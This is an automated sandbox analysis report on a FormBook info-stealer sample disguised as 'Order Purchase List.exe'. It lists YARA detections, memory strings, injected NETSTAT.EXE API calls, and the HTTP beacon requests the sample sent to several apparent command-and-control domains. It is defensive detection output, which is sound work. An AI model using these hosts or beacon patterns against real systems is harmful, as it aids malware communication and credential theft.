Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 08 Oct 2021 09:24:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeSet-Cookie: security_session_verify=b916c671982bbc4ddcef9e4fa11e215e; expires=Mon, 11-Oct-21 17:24:34 GMT; path=/; HttpOnlyData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: Order Purchase List.exe, 00000000.00000003.272440740.00000000017CD000.00000004.00000001.sdmp	String found in binary or memory: http://en.w5
Source: Order Purchase List.exe, 00000000.00000003.272981556.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com:
Source: explorer.exe, 0000000C.00000000.361157052.000000000EE50000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 0000000C.00000000.361157052.000000000EE50000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.micr
Source: NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	String found in binary or memory: http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/boots
Source: NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	String found in binary or memory: http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/commo
Source: NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	String found in binary or memory: http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/font-
Source: NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	String found in binary or memory: http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/images/fa
Source: NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	String found in binary or memory: http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/mad_desig
Source: NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	String found in binary or memory: http://www.auxiliacapitalpartnersllc.com/wp-login.php
Source: Order Purchase List.exe, 00000000.00000003.277778999.00000000063ED000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Order Purchase List.exe, 00000000.00000003.277526176.00000000063E9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers#:?$
Source: Order Purchase List.exe, 00000000.00000003.277526176.00000000063E9000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersU
Source: Order Purchase List.exe, 00000000.00000003.272773101.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com-u
Source: Order Purchase List.exe, 00000000.00000003.272773101.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com?
Source: Order Purchase List.exe, 00000000.00000003.272773101.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comTF
Source: Order Purchase List.exe, 00000000.00000003.272773101.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comWe
Source: Order Purchase List.exe, 00000000.00000003.272795340.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comnfB
Source: Order Purchase List.exe, 00000000.00000003.274284669.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.c
Source: Order Purchase List.exe, 00000000.00000003.274340079.000000000641D000.00000004.00000001.sdmp, Order Purchase List.exe, 00000000.00000003.274272697.000000000641D000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Order Purchase List.exe, 00000000.00000003.274443384.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: Order Purchase List.exe, 00000000.00000003.274443384.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/t(
Source: Order Purchase List.exe, 00000000.00000003.274272697.000000000641D000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnA
Source: Order Purchase List.exe, 00000000.00000003.274272697.000000000641D000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnH$N
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/4-2$
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/;-
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Kal1
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Verd
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/_-Y$y
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/a-e
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/e-c$
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ito
Source: Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Order Purchase List.exe, 00000000.00000003.272701872.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Order Purchase List.exe, 00000000.00000003.273760229.00000000063E6000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Order Purchase List.exe, 00000000.00000003.273760229.00000000063E6000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krC
Source: Order Purchase List.exe, 00000000.00000003.273760229.00000000063E6000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krlea
Source: Order Purchase List.exe, 00000000.00000003.273028337.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Order Purchase List.exe, 00000000.00000003.273561425.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com:
Source: Order Purchase List.exe, 00000000.00000003.272981556.00000000063FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comn

Source: unknown

DNS traffic detected: queries for: www.inatividigitali.com

Source: global traffic	HTTP traffic detected: GET /gnui/?D81Ltve=MSRjHgM9j7I5HOqdL19ZieQAx0QZYnhjbVtYOT6RDGM9GDKuXhbXwP3ESIufbr/Me9Gt&v0=mjfD3V_ HTTP/1.1Host: www.inatividigitali.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnui/?D81Ltve=jxkSMADL8om04CnCt2uvg3koohdaHD/94Z7CDjzCNfrBt1nbgpVJnnhJbuZar5zysKNA&v0=mjfD3V_ HTTP/1.1Host: www.auxiliacapitalpartnersllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_ HTTP/1.1Host: www.hottorchlighter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnui/?D81Ltve=+ILGKZDievfdlhE08A6+0Ox9ZT8Pbvv5JFHshEbNzSpcbgaG6QnGXyVZrWQJJYTOfSqp&v0=mjfD3V_ HTTP/1.1Host: www.bigbigsea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Order Purchase List.exe

Source: Order Purchase List.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_00401030	10_2_00401030
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041B8D6	10_2_0041B8D6
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041BB78	10_2_0041BB78
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041BBEA	10_2_0041BBEA
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041BCF2	10_2_0041BCF2
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_00408C90	10_2_00408C90
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041C4BF	10_2_0041C4BF
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_00402D87	10_2_00402D87
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_00402D90	10_2_00402D90
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_00402FB0	10_2_00402FB0
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_009F732F	10_2_009F732F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F322AE	19_2_02F322AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2DBD2	19_2_02F2DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9EBB0	19_2_02E9EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F32B28	19_2_02F32B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F328EC	19_2_02F328EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E920A0	19_2_02E920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F320A8	19_2_02F320A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7B090	19_2_02E7B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F3E824	19_2_02F3E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21002	19_2_02F21002
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E84120	19_2_02E84120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6F900	19_2_02E6F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F32EF7	19_2_02F32EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E86E30	19_2_02E86E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2D616	19_2_02F2D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F31FF1	19_2_02F31FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F3DFCE	19_2_02F3DFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2D466	19_2_02F2D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7841F	19_2_02E7841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7D5E0	19_2_02E7D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F325DD	19_2_02F325DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92581	19_2_02E92581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F31D55	19_2_02F31D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E60D20	19_2_02E60D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F32D07	19_2_02F32D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B0BB78	19_2_02B0BB78
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B0B8D6	19_2_02B0B8D6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02AF2FB0	19_2_02AF2FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02AF8C90	19_2_02AF8C90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02AF2D87	19_2_02AF2D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02AF2D90	19_2_02AF2D90

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Code function: String function: 02E6B150 appears 35 times

Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_004185F0 NtCreateFile,	10_2_004185F0
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_004186A0 NtReadFile,	10_2_004186A0
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_00418720 NtClose,	10_2_00418720
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_004187D0 NtAllocateVirtualMemory,	10_2_004187D0
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_004185EA NtCreateFile,	10_2_004185EA
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041871A NtClose,	10_2_0041871A
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_004187CA NtAllocateVirtualMemory,	10_2_004187CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9A50 NtCreateFile,LdrInitializeThunk,	19_2_02EA9A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9860 NtQuerySystemInformation,LdrInitializeThunk,	19_2_02EA9860
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9840 NtDelayExecution,LdrInitializeThunk,	19_2_02EA9840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA99A0 NtCreateSection,LdrInitializeThunk,	19_2_02EA99A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	19_2_02EA9910
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA96E0 NtFreeVirtualMemory,LdrInitializeThunk,	19_2_02EA96E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA96D0 NtCreateKey,LdrInitializeThunk,	19_2_02EA96D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9660 NtAllocateVirtualMemory,LdrInitializeThunk,	19_2_02EA9660
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9650 NtQueryValueKey,LdrInitializeThunk,	19_2_02EA9650
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9FE0 NtCreateMutant,LdrInitializeThunk,	19_2_02EA9FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9780 NtMapViewOfSection,LdrInitializeThunk,	19_2_02EA9780
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9710 NtQueryInformationToken,LdrInitializeThunk,	19_2_02EA9710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA95D0 NtClose,LdrInitializeThunk,	19_2_02EA95D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9540 NtReadFile,LdrInitializeThunk,	19_2_02EA9540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9A80 NtOpenDirectoryObject,	19_2_02EA9A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9A20 NtResumeThread,	19_2_02EA9A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9A00 NtProtectVirtualMemory,	19_2_02EA9A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9A10 NtQuerySection,	19_2_02EA9A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EAA3B0 NtGetContextThread,	19_2_02EAA3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9B00 NtSetValueKey,	19_2_02EA9B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA98F0 NtReadVirtualMemory,	19_2_02EA98F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA98A0 NtWriteVirtualMemory,	19_2_02EA98A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EAB040 NtSuspendThread,	19_2_02EAB040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9820 NtEnumerateKey,	19_2_02EA9820
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA99D0 NtCreateProcessEx,	19_2_02EA99D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9950 NtQueueApcThread,	19_2_02EA9950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9670 NtQueryInformationProcess,	19_2_02EA9670
